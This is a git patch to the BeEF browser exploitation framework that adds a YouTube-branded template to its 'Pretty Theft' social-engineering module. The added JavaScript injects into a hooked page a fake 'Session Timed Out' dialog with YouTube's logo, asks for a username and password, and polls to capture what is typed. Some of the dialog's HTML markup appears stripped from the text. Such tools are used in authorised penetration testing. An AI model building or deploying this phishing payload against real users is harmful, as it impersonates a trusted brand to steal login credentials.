From 753a78f5fc35c4b22a5d9cb096d1c2be8c0b7f84 Mon Sep 17 00:00:00 2001 From: bcoles Date: Tue, 19 Feb 2013 15:19:27 +1030 Subject: [PATCH] Add YouTube template to Pretty Theft module --- .../pretty_theft/command.js | 52 +++++++++++++++---- .../social_engineering/pretty_theft/module.rb | 2 +- 2 files changed, 43 insertions(+), 11 deletions(-) diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js index fea87a230..c29ca3060 100644 --- a/modules/social_engineering/pretty_theft/command.js +++ b/modules/social_engineering/pretty_theft/command.js @@ -163,6 +163,35 @@ beef.execute(function() { credgrabber = setInterval(checker,1000); } + // YouTube floating div + function youtube() { + + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'popup'); + sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); + document.body.appendChild(sneakydiv); + + // Set appearance using styles, maybe cleaner way to do this with CSS block? + var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"'; + var windowmain = 'style="border:1px #555 solid;"'; + var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"'; + var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; + var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; + var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"'; + var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"'; + var buttonstyle = 'style="font-size: 13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; + var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png'; + var title = 'Session Timed Out YouTube'; + var messagewords = 'Your session has timed out due to inactivity.

Please re-enter your username and password to login.'; + var buttonLabel = ''; + + // Build page including styles + sneakydiv.innerHTML= '
' +title+ '

' + messagewords + '

Username:
Password:
' + '
' +buttonLabel+ '
'; + + // Repeatedly check if button has been pressed + credgrabber = setInterval(checker,1000); + + } // Generic floating div with image function generic() { @@ -181,19 +210,22 @@ beef.execute(function() { // Set background opacity and apply background var backcolor = "<%== @backing %>"; if(backcolor == "Grey"){ - grayOut(true,{'opacity':'70'}); - }else if(backcolor == "Clear"){ - grayOut(true,{'opacity':'0'}); + grayOut(true,{'opacity':'70'}); + } else if(backcolor == "Clear"){ + grayOut(true,{'opacity':'0'}); } - // Retrieve the chosen div option from Beef and display + // Retrieve the chosen div option from BeEF and display var choice = "<%= @choice %>"; - if(choice == "Facebook"){ - facebook(); - } else if(choice == "LinkedIn"){ - linkedin(); - } else{ - generic(); + switch (choice) { + case "Facebook": + facebook(); break; + case "LinkedIn": + linkedin(); break; + case "YouTube": + youtube(); break; + default: + generic(); break; } }); diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb index bb58c0a8f..3a15d7be5 100644 --- a/modules/social_engineering/pretty_theft/module.rb +++ b/modules/social_engineering/pretty_theft/module.rb @@ -9,7 +9,7 @@ class Pretty_theft < BeEF::Core::Command configuration = BeEF::Core::Configuration.instance logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png" return [ - {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, + {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, {'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },